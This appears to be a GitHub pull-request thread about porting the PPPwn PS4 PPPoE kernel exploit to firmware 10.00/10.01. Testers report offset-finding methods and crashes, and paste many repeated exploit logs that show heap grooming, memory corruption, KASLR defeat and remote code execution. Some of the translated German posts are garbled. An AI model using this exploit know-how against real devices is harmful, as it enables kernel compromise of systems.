✨ 10.00/10.01 Support

[iMrDJAi]

(untested)

[iMrDJAi]

Special thanks to Zecoxao for his help.

Don't merge this yet, gotta test it.

[loskutov]

You probably also want to modify the offsets.h files

[TheOfficialFloW]

Thanks!

• add offsets in stage1 and stage2
• test it

[iMrDJAi]

Gonna test it once I'm done with 9.03 :)) I'll test it now.

Edit: I forgot stage2 offsets. 🤦‍♂️

[DJTOMATO]

I am on 9.03 I can help testing it if you want

[EchoStretch]

I tried 4 times on 10.01 and no luck did u get it work ?

[iMrDJAi]

@TheOfficialFloW Seems like there is something strange happening during Waiting for IPCP configure request... step. It fails, and eventually the console terminates the connection and subsequently crashes (likely a side effect of object corruption).
I'm sending you a Wireshark dump over email.

Btw, I'm running the python script on windows. Could be the reason tho, so I'm going to boot Linux and test again.

[iMrDJAi]

I tried 4 times on 10.01 and no luck did u get it work ?

@EchoStretch Nope :/

[EchoStretch]

yea same, Im crashing here. Im using Oracle VM

[EchoStretch]

what are u using to get offsets. Maybe not correct?

[iMrDJAi]

@EchoStretch Odd. As you got to that stage, it's likely to be an offset issue then. Going to recheck all of them.

what are u using to get offsets

Ghidra, and I'm manually xrefing.

[fabianlanza]

what are u using to get offsets. Maybe not correct?

What do you use?

[EchoStretch]

IDA and Ghidra

[iMrDJAi]

Seems like the changes that theflow0 just made improved stability. While the script still freezes at Waiting for IPCP configure request..., the console didn't crash for the first 2 tries. In the third one, it crashed, and a white noise appeared on the screen scaring the hell out of me. 😆

[fabianlanza]

Teach me your ways🥲😂

[sealldeveloper]

Gonna test it once I'm done with 9.03 :)) I'll test it now.

Edit: I forgot stage2 offsets. 🤦‍♂️

Also have a 9.03 and would be interested to see it working, sorry I can't really help much I'm not super proficient in this space :>

[fabianlanza]

Gonna test it once I'm done with 9.03 :)) I'll test it now.
Edit: I forgot stage2 offsets. 🤦‍♂️

Also have a 9.03 and would be interested to see it working, sorry I can't really help much I'm not super proficient in this space :>

yeah me either but I want to help and learn lol

[EchoStretch]

So I Tried
10.01 on FAT always crashed | Works after fix
9.00 on Slim always crashed
9.00 on Pro always worked

I've talk with lightingmod and he is on 9.00 pro and it always work and i talked with moddedwarfare and his is on a fat 11.00 and its always works.

I'm Lost.. lol

[Loafdude]

Just for more data my 9.00 Pro exploit is 50/50 success rate
Fails sometimes on Scanning for corrupted object

[Ic3bu7g]

Could we get Some sort of homebrew enabler coming soon?

[fffoo]

If there will be 10.50 support in progress I can help test it

[noamb14]

Gonna test it once I'm done with 9.03 :)) I'll test it now.

Edit: I forgot stage2 offsets. 🤦‍♂️

I am also on 9.03 and would like to help testing it😁

[iMrDJAi]

10.01 can wait. Gonna continue working on 9.03.

[noamb14]

10.01 can wait. Gonna continue working on 9.03.

You mean 9.03 can wait but I get you. Good luck you are doing a mighty work

[se2crid]

tested on 10.01 fat ps4 does not work: [+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=enp0s3 fw=1001 stage1=stage1/stage1.bin stage2=stage2/stage2.bin

[+] STAGE 0: Initialization
[] Waiting for PADI...
[+] pppoe_softc: 0xffffcf15299f7a00
[+] Target MAC: 0c:fe:45:00:25:e0
[+] Source MAC: 07:7a:9f:29:15:cf
[+] AC cookie length: 0x4e0
[] Sending PADO...
[] Waiting for PADR...
[] Sending PADS...
[] Waiting for LCP configure request...
[] Sending LCP configure ACK...
[] Sending LCP configure request...
[] Waiting for LCP configure ACK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure NAK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure ACK...
[] Sending IPCP configure request...
[] Waiting for IPCP configure ACK...
[*] Waiting for interface to be ready...
[+] Target IPv6: fe80::efe:45ff:fe00:25e0
[+] Heap grooming...done

[+] STAGE 1: Memory corruption
[+] Pinning to CPU 0...done
[] Sending malicious LCP configure request...
[] Waiting for LCP configure request...
[] Sending LCP configure ACK...
[] Sending LCP configure request...
[] Waiting for LCP configure ACK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure NAK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure ACK...
[] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[-] Scanning for corrupted object...failed

[xeonios-studio]

Konsolendaten:
Name: PS4 Pro
Modell: CUH-7016B
Firmware-Version: 10.01
Anschluss: PC zu PS4 Whit LAN.

Hi, I tested it on Windows with a Linux VM.
During startup, network setup, network check, ECT.

But I noticed interesting behavior patterns of the console.It reacts once out of 10 cases but goes straight out.
When I want to start it up it goes off again, only when I press power 3 times does it come on.

I hope I was able to contribute something useful.

"Das offizielle FloW scheint, als ob etwas Seltsames während des Waiting for IPCP configure request...Schritt. Es scheitert, und schließlich beendet die Konsole die Verbindung und stürzt anschließend ab (wahrscheinlich eine Nebenwirkung der Objektbeschädigung). Ich schicke Ihnen einen Wireshark-Dump über E-Mail.

Btw, ich laufe das Python-Skript an den Fenstern. Könnte der Grund sein, also werde ich Linux booten und wieder testen.

Genau das gleiche bei mir.

Console data:
Name: PS4 Pro
Model: CUH-7016B
Firmware-Version: 10.01
Connection: PC to PS4 whit LAN.

[lompaket]

worked first try on 10.01 fat ps4

Can you send the precompiled file? I am on 10.01 slim it does not work. fails at corrupted object

[xeonios-studio]

arbeitete zuerst an 10.01 fett ps4

Kannst du die vorkompilierte Datei senden? Ich bin am 10.01 schlank, es funktioniert nicht. versagt bei beschädigtem Objekt

My way: first FW:900 Command and then FW=1100 Command At (PS4 boot)

[iMrDJAi]

🎉

[xeonios-studio]

10.01 Objekt gefunden: (ACHTUNG: Konsole Automatische OFF-)

War dies der Schalts passiert Dan? PS4 direkte geht aus und bei der Kraftschutz drücken 2 Töne.

Name: PS4 Pro Modell: CUH-7016B Firmware-Version: 10.01

Bis jetzt kein Erfolg mehr mit Object Suche und Debug mode auch nicht (Konsole stürtzt ab) .... :(

[xeonios-studio]

10.01 Objekt-Vet.: Konsole
War dies der Schalts-Schreckens-Jame? PS4 direkte geht aus und bei der Kraftdruckschutz 2
Name: PS4 Pro Modell: CUH-7016B Firmware-Version: 10.01

Bis jetzt kein weiteren Erfolg mehr mit Object Suche und Debug auch nicht Konsolen immer BlackScreen -> OFF .... :(

[ttoille123]

fails at corrupted object

Just try over and over again. It will eventually work

[xeonios-studio]

scheitern an beschädigten Objekt

Versuchen Sie es immer und immer wieder. Es wird schließlich funktionieren

Ich habe es jetzt so oft versucht auf alle möglichen wege und es Funktioniert nicht mehr

1. wenn eine Reaktion kommt = Power OFF
2. Object Failed.

[xeonios-studio]

10.01 Objekt-Vet.: Konsole
War dies der Schalts-Schreckens-Jame? PS4 direkt aus Kraftdruckschutz 2
Name: PS4 Pro Modell: CUH-7016B Firmware-Version: 10.01

Bisbisz z.B. z.B. mit Object Suche und Debug nicht Konsolen immer BlackScreen -> OFF .... :(

Payload successful !!!! , but no debug menu
FW: 10.01

Test 2.0: successful Payload, No Debug menu

[k3sh0s]

tested it on 10.01

[+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=eth0 fw=1001 stage1=stage1/stage1.bin stage2=stage2/stage2.bin

[+] STAGE 0: Initialization
[] Waiting for PADI...
[+] pppoe_softc: 0xffff9e9f166ae000
[+] Target MAC: c8:63:f1:a9:5f:04
[+] Source MAC: 07:e0:0a:16:9f:2o
[+] AC cookie length: 0x4e0
[] Sending PADO...
[] Waiting for PADR...
[] Sending PADS...
[] Sending LCP configure request...
[] Waiting for LCP configure ACK...
[] Waiting for LCP configure request...
[] Sending LCP configure ACK...
[] Sending IPCP configure request...
[] Waiting for IPCP configure ACK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure NAK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure ACK...
[*] Waiting for interface to be ready...
[+] Target IPv6: fe80::ca63:f1ff:fea9:5g9
[+] Heap grooming...done

[+] STAGE 1: Memory corruption
[+] Pinning to CPU 0...done
[] Sending malicious LCP configure request...
[] Waiting for LCP configure reject...
[] Sending LCP configure request...
[] Waiting for LCP configure ACK...
[] Waiting for LCP configure request...
[] Sending LCP configure ACK...
[] Sending IPCP configure request...
[] Waiting for IPCP configure ACK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure NAK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure ACK...
[+] Scanning for corrupted object...found fe80::08df:4141:4141:8989

[+] STAGE 2: KASLR defeat
[*] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffffc8449920
[+] kaslr_offset: 0x43fdc000

[+] STAGE 3: Remote code execution
[] Sending LCP terminate request...
[] Waiting for PADI...

then just crashes and has a bit of trouble turning on

[xeonios-studio]

tested it on 10.01

[+] PPPwn - PlayStation 4 PPPoE RCE by theflow

[+] args: interface=eth0 fw=1001 stage1=stage1/stage1.bin stage2=stage2/stage2.bin

[+] STAGE 0: Initialization

[*] Waiting for PADI...

[+] pppoe_softc: 0xffff9e9f166ae000

[+] Target MAC: c8:63:f1:a9:5f:04

[+] Source MAC: 07:e0:0a:16:9f:2o

[+] AC cookie length: 0x4e0

[*] Sending PADO...

[*] Waiting for PADR...

[*] Sending PADS...

[*] Sending LCP configure request...

[*] Waiting for LCP configure ACK...

[*] Waiting for LCP configure request...

[*] Sending LCP configure ACK...

[*] Sending IPCP configure request...

[*] Waiting for IPCP configure ACK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure NAK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure ACK...

[*] Waiting for interface to be ready...

[+] Target IPv6: fe80::ca63:f1ff:fea9:5g9

[+] Heap grooming...done

[+] STAGE 1: Memory corruption

[+] Pinning to CPU 0...done

[*] Sending malicious LCP configure request...

[*] Waiting for LCP configure reject...

[*] Sending LCP configure request...

[*] Waiting for LCP configure ACK...

[*] Waiting for LCP configure request...

[*] Sending LCP configure ACK...

[*] Sending IPCP configure request...

[*] Waiting for IPCP configure ACK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure NAK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure ACK...

[+] Scanning for corrupted object...found fe80::08df:4141:4141:8989

[+] STAGE 2: KASLR defeat

[*] Defeating KASLR...

[+] pppoe_softc_list: 0xffffffffc8449920

[+] kaslr_offset: 0x43fdc000

[+] STAGE 3: Remote code execution

[*] Sending LCP terminate request...

[*] Waiting for PADI...

then just crashes and has a bit of trouble turning on

Mein weg:

(1) PPPwn Ready
(2) PS4 Internet-test
(3) Open Quick Menu and Scroll
(4) Finish

[nanocodium]

tested it on 10.01
[+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=eth0 fw=1001 stage1=stage1/stage1.bin stage2=stage2/stage2.bin
[+] STAGE 0: Initialization
[] Waiting for PADI...
[+] pppoe_softc: 0xffff9e9f166ae000
[+] Target MAC: c8:63:f1:a9:5f:04
[+] Source MAC: 07:e0:0a:16:9f:2o
[+] AC cookie length: 0x4e0
[] Sending PADO...
[] Waiting for PADR...
[] Sending PADS...
[] Sending LCP configure request...
[] Waiting for LCP configure ACK...
[] Waiting for LCP configure request...
[] Sending LCP configure ACK...
[] Sending IPCP configure request...
[] Waiting for IPCP configure ACK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure NAK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure ACK...
[] Waiting for interface to be ready...
[+] Target IPv6: fe80::ca63:f1ff:fea9:5g9
[+] Heap grooming...done
[+] STAGE 1: Memory corruption
[+] Pinning to CPU 0...done
[] Sending malicious LCP configure request...
[] Waiting for LCP configure reject...
[] Sending LCP configure request...
[] Waiting for LCP configure ACK...
[] Waiting for LCP configure request...
[] Sending LCP configure ACK...
[] Sending IPCP configure request...
[] Waiting for IPCP configure ACK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure NAK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure ACK...
[+] Scanning for corrupted object...found fe80::08df:4141:4141:8989
[+] STAGE 2: KASLR defeat
[] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffffc8449920
[+] kaslr_offset: 0x43fdc000
[+] STAGE 3: Remote code execution
[] Sending LCP terminate request...
[] Waiting for PADI...
then just crashes and has a bit of trouble turning on

Mein weg:

(1) PPPwn Ready (2) PS4 Internet-test (3) Open Quick Menu and Scroll (4) Finish

he made an error when compiling he compiled stage1 & 2 with the FW=1100 instead of 1001 lmfao

[xeonios-studio]

tested it on 10.01

[+] PPPwn - PlayStation 4 PPPoE RCE by theflow

[+] args: interface=eth0 fw=1001 stage1=stage1/stage1.bin stage2=stage2/stage2.bin

[+] STAGE 0: Initialization

[*] Waiting for PADI...

[+] pppoe_softc: 0xffff9e9f166ae000

[+] Target MAC: c8:63:f1:a9:5f:04

[+] Source MAC: 07:e0:0a:16:9f:2o

[+] AC cookie length: 0x4e0

[*] Sending PADO...

[*] Waiting for PADR...

[*] Sending PADS...

[*] Sending LCP configure request...

[*] Waiting for LCP configure ACK...

[*] Waiting for LCP configure request...

[*] Sending LCP configure ACK...

[*] Sending IPCP configure request...

[*] Waiting for IPCP configure ACK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure NAK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure ACK...

[*] Waiting for interface to be ready...

[+] Target IPv6: fe80::ca63:f1ff:fea9:5g9

[+] Heap grooming...done

[+] STAGE 1: Memory corruption

[+] Pinning to CPU 0...done

[*] Sending malicious LCP configure request...

[*] Waiting for LCP configure reject...

[*] Sending LCP configure request...

[*] Waiting for LCP configure ACK...

[*] Waiting for LCP configure request...

[*] Sending LCP configure ACK...

[*] Sending IPCP configure request...

[*] Waiting for IPCP configure ACK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure NAK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure ACK...

[+] Scanning for corrupted object...found fe80::08df:4141:4141:8989

[+] STAGE 2: KASLR defeat

[*] Defeating KASLR...

[+] pppoe_softc_list: 0xffffffffc8449920

[+] kaslr_offset: 0x43fdc000

[+] STAGE 3: Remote code execution

[*] Sending LCP terminate request...

[*] Waiting for PADI...

then just crashes and has a bit of trouble turning on

Mein weg:

(1) PPPwn Ready (2) PS4 Internet-test (3) Open Quick Menu and Scroll (4) Finish

he made an error when compiling he compiled stage1 & 2 with the FW=1100 instead of 1001 lmfao

Oh😅,

Payload always works for me now but the debug menu does not appear...🤷🏻‍♂️

[se2crid]

tested it on 10.01

[+] PPPwn - PlayStation 4 PPPoE RCE by theflow

[+] args: interface=eth0 fw=1001 stage1=stage1/stage1.bin stage2=stage2/stage2.bin

[+] STAGE 0: Initialization

[*] Waiting for PADI...

[+] pppoe_softc: 0xffff9e9f166ae000

[+] Target MAC: c8:63:f1:a9:5f:04

[+] Source MAC: 07:e0:0a:16:9f:2o

[+] AC cookie length: 0x4e0

[*] Sending PADO...

[*] Waiting for PADR...

[*] Sending PADS...

[*] Sending LCP configure request...

[*] Waiting for LCP configure ACK...

[*] Waiting for LCP configure request...

[*] Sending LCP configure ACK...

[*] Sending IPCP configure request...

[*] Waiting for IPCP configure ACK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure NAK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure ACK...

[*] Waiting for interface to be ready...

[+] Target IPv6: fe80::ca63:f1ff:fea9:5g9

[+] Heap grooming...done

[+] STAGE 1: Memory corruption

[+] Pinning to CPU 0...done

[*] Sending malicious LCP configure request...

[*] Waiting for LCP configure reject...

[*] Sending LCP configure request...

[*] Waiting for LCP configure ACK...

[*] Waiting for LCP configure request...

[*] Sending LCP configure ACK...

[*] Sending IPCP configure request...

[*] Waiting for IPCP configure ACK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure NAK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure ACK...

[+] Scanning for corrupted object...found fe80::08df:4141:4141:8989

[+] STAGE 2: KASLR defeat

[*] Defeating KASLR...

[+] pppoe_softc_list: 0xffffffffc8449920

[+] kaslr_offset: 0x43fdc000

[+] STAGE 3: Remote code execution

[*] Sending LCP terminate request...

[*] Waiting for PADI...

then just crashes and has a bit of trouble turning on

Mein weg:

(1) PPPwn Ready (2) PS4 Internet-test (3) Open Quick Menu and Scroll (4) Finish

he made an error when compiling he compiled stage1 & 2 with the FW=1100 instead of 1001 lmfao

Oh😅,

Payload always works for me now but the debug menu does not appear...🤷🏻‍♂️

It is wip, so no debug menu, all that should happen is PPPwn in top left

[xeonios-studio]

tested it on 10.01

[+] PPPwn - PlayStation 4 PPPoE RCE by theflow

[+] args: interface=eth0 fw=1001 stage1=stage1/stage1.bin stage2=stage2/stage2.bin

[+] STAGE 0: Initialization

[*] Waiting for PADI...

[+] pppoe_softc: 0xffff9e9f166ae000

[+] Target MAC: c8:63:f1:a9:5f:04

[+] Source MAC: 07:e0:0a:16:9f:2o

[+] AC cookie length: 0x4e0

[*] Sending PADO...

[*] Waiting for PADR...

[*] Sending PADS...

[*] Sending LCP configure request...

[*] Waiting for LCP configure ACK...

[*] Waiting for LCP configure request...

[*] Sending LCP configure ACK...

[*] Sending IPCP configure request...

[*] Waiting for IPCP configure ACK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure NAK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure ACK...

[*] Waiting for interface to be ready...

[+] Target IPv6: fe80::ca63:f1ff:fea9:5g9

[+] Heap grooming...done

[+] STAGE 1: Memory corruption

[+] Pinning to CPU 0...done

[*] Sending malicious LCP configure request...

[*] Waiting for LCP configure reject...

[*] Sending LCP configure request...

[*] Waiting for LCP configure ACK...

[*] Waiting for LCP configure request...

[*] Sending LCP configure ACK...

[*] Sending IPCP configure request...

[*] Waiting for IPCP configure ACK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure NAK...

[*] Waiting for IPCP configure request...

[*] Sending IPCP configure ACK...

[+] Scanning for corrupted object...found fe80::08df:4141:4141:8989

[+] STAGE 2: KASLR defeat

[*] Defeating KASLR...

[+] pppoe_softc_list: 0xffffffffc8449920

[+] kaslr_offset: 0x43fdc000

[+] STAGE 3: Remote code execution

[*] Sending LCP terminate request...

[*] Waiting for PADI...

then just crashes and has a bit of trouble turning on

Mein weg:

(1) PPPwn Ready (2) PS4 Internet-test (3) Open Quick Menu and Scroll (4) Finish

he made an error when compiling he compiled stage1 & 2 with the FW=1100 instead of 1001 lmfao

Oh😅,

Payload always works for me now but the debug menu does not appear...🤷🏻‍♂️

It is wip, so no debug menu, all that should happen is PPPwn in top left

ok thanks, that means I did everything right and my console is ready😇

[lompaket]

why doesn't it work for me :(

[se2crid]

why doesn't it work for me :(

try again?

[ttoille123]

why doesn't it work for me :(

In my experience(not a lot) it can take a lot of tries @lompaket

[loskutov]

You can try tuning some parameters in the script (e.g. the ones changed in 0730790)

[ttoille123]

Might try that. I think 1/8 tries max work. either fails at memory curroption, or IPCP configure request... when it goes past those 2 points it works perfectly.

[lompaket]

I have tried over 20 times

it mostly fails at checking for corruption or something and crashed 2~3 times

[bl4d3rvnner7]

I tried 4 times on 10.01 and no luck did u get it work ?

Same here, no success on 10.01.

It hangs at the "Waiting for PADR".

Here is an ouptut :

[+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=Ethernet fw=1001 stage1=stage1/stage1.bin stage2=stage2/stage2.bin

[+] STAGE 0: Initialization
[*] Waiting for PADI...
[+] pppoe_softc: xxxxxxxxxxx
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: xx:xxxx:xx:xx:xx
[+] AC cookie length: 0x4e0
[*] Sending PADO...
[*] Waiting for PADR...

Console : PS4 Pro

[se2crid]

works fine for me 10.01 fat ps4

[JoElH4ck3r2022]

I tried 4 times on 10.01 and no luck did u get it work ?

Same here, no success on 10.01.

It hangs at the "Waiting for PADR".

Here is an ouptut :

[+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=Ethernet fw=1001 stage1=stage1/stage1.bin stage2=stage2/stage2.bin

[+] STAGE 0: Initialization
[*] Waiting for PADI...
[+] pppoe_softc: xxxxxxxxxxx
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: xx:xxxx:xx:xx:xx
[+] AC cookie length: 0x4e0
[*] Sending PADO...
[*] Waiting for PADR...

Console : PS4 Pro

use the network cable to directly connect PS4 and PC, I had the same problem.

It worked perfectly here 10.00!!

[xeonios-studio]

Ich habe mal aus Langeweile versucht Goldhen als Payload zu senden.... Error.

D:\PPPwnGo-main>python pppwn.py --interface="Realtek Gaming 2.5GbE Family Controller" --fw=1001
[+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=Realtek Gaming 2.5GbE Family Controller fw=1001 stage1=stage1/stage1.bin stage2=stage2/stage2.bin

[+] STAGE 0: Initialization
[] Waiting for PADI...
[+] pppoe_softc: 0xffff95ea2c69ee00
[+] Target MAC: bc:60:a7:9b:8a:aa
[+] Source MAC: 07:ee:69:2c:ea:95
[+] AC cookie length: 0x4e0
[] Sending PADO...
[] Waiting for PADR...
[] Sending PADS...
[] Sending LCP configure request...
[] Waiting for LCP configure ACK...
[] Waiting for LCP configure request...
[] Sending LCP configure ACK...
[] Sending IPCP configure request...
[] Waiting for IPCP configure ACK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure NAK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure ACK...
[*] Waiting for interface to be ready...
[+] Target IPv6: fe80::be60:a7ff:fe9b:8aaa
[+] Heap grooming...done

[+] STAGE 1: Memory corruption
[+] Pinning to CPU 0...done
[] Sending malicious LCP configure request...
[] Waiting for LCP configure reject...
[] Sending LCP configure request...
[] Waiting for LCP configure ACK...
[] Waiting for LCP configure request...
[] Sending LCP configure ACK...
[] Sending IPCP configure request...
[] Waiting for IPCP configure ACK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure NAK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure ACK...
[+] Scanning for corrupted object...found fe80::0a3f:4141:4141:4141

[+] STAGE 2: KASLR defeat
[*] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffff853ed920
[+] kaslr_offset: 0xf80000

[+] STAGE 3: Remote code execution
[] Sending LCP terminate request...
[] Waiting for PADI...
[+] pppoe_softc: 0xffff95ea2c69ee00
[+] Target MAC: bc:60:a7:9b:8a:aa
[+] Source MAC: 5d:9c:1c:83:ff:ff
[+] AC cookie length: 0x518
[] Sending PADO...
[] Waiting for PADR...
[] Sending PADS...
[] Triggering code execution...
[] Waiting for stage1 to resume...
[] Sending PADT...
[] Waiting for PADI...
[+] pppoe_softc: 0xffff95ea2c397800
[+] Target MAC: bc:60:a7:9b:8a:aa
[+] AC cookie length: 0x0
[] Sending PADO...
[] Waiting for PADR...
[] Sending PADS...
[] Sending LCP configure request...
[] Waiting for LCP configure ACK...
[] Waiting for LCP configure request...
[] Sending LCP configure ACK...
[] Sending IPCP configure request...
[] Waiting for IPCP configure ACK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure NAK...
[] Waiting for IPCP configure request...
[] Sending IPCP configure ACK...

[+] STAGE 4: Arbitrary payload execution
[*] Sending stage2 payload...
Traceback (most recent call last):
File "D:\PPPwnGo-main\pppwn.py", line 857, in
exit(main())
^^^^^^
File "D:\PPPwnGo-main\pppwn.py", line 851, in main
exploit.run()
File "D:\PPPwnGo-main\pppwn.py", line 810, in run
frags = fragment(
^^^^^^^^^
File "C:\Users\kevin\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0\LocalCache\local-packages\Python312\site-packages\scapy\layers\inet.py", line 1146, in fragment
s = raw(p[IP].payload)
^^^^^^^^^^^^^^^^^^
File "C:\Users\kevin\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0\LocalCache\local-packages\Python312\site-packages\scapy\compat.py", line 294, in raw
return bytes(x)
^^^^^^^^
File "C:\Users\kevin\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0\LocalCache\local-packages\Python312\site-packages\scapy\packet.py", line 589, in bytes
return self.build()
^^^^^^^^^^^^
File "C:\Users\kevin\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0\LocalCache\local-packages\Python312\site-packages\scapy\packet.py", line 730, in build
p = self.do_build()
^^^^^^^^^^^^^^^
File "C:\Users\kevin\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0\LocalCache\local-packages\Python312\site-packages\scapy\packet.py", line 715, in do_build
return self.post_build(pkt, pay)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\kevin\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0\LocalCache\local-packages\Python312\site-packages\scapy\layers\inet.py", line 848, in post_build
p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
^^^^^^^^^^^^^^^^^^^^^^^^^^
struct.error: 'H' format requires 0 <= number <= 65535

D:\PPPwnGo-main>pause
Drücken Sie eine beliebige Taste . . .

[xeonios-studio]

Found corrupted object on Firmware 10.01 :

(1) fe80::07a5:4141:4141:4141

(2) fe80::0363:4141:4141:4141

(3) fe80::0da7:4141:4141:4141

[lompaket]

I have an oddly specific problem. weekstrt on discord if you want to try help me

in short when I try exploiting from my main OS (fedora) it crashes my ps4 everytime

If I live boot a usb with something else like linux mint it works
the problem is not python version